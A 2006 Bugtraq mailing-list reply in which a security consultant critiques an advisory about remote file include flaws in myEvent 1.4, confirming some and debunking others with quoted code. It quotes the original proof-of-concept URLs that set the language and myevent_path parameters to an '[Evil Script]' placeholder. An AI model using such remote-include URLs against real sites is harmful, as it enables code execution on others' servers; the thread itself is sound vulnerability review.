Bugtraq mailing list archives

Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities

From: "Carsten Eilers" <ceilers-lists () gmx de>
Date: Sun, 13 Aug 2006 14:31:44 +0200

sh3ll () sh3ll ir schrieb am Sat, 12 Aug 2006 10:03:15 +0000:

-------------admin.php--------------------------------------

....

<?php

       include_once($language);

       ?>

...


Take a look at config.php:

$language = "lang_eng.php";

an at admin.php:

<?
include "config.php";
include_once('includes/template.php');
include_once($language);
$template = new Template('templates/') ;


Ups... :-)

-------------event.php--------------------------------------


This one works. BTDT.

-------------initialize.php-----------------------------------


This one works, too.

-------------myevent.php------------------------------------


Have you even tried to run this script?

| Parse error: parse error in XXXXXX/myevent/myevent.php on line 4

Missing ; in line 3:

| $myevent_path =""

Oh oh...

-------------viewevent.php-----------------------------------


This one works, too.

PoC:

~~~

http://www.target.com/[myEvent]/admin.php?language=[Evil Script]

http://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]

http://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]

http://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]

http://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]


Did you test all of them? That way?
I don't think so.

Regards
  Carsten


--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>

Current thread:

myEvent <= 1.4 Multiple Remote File Include Vulnerabilities sh3ll (Aug 12)
- Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities Carsten Eilers (Aug 14)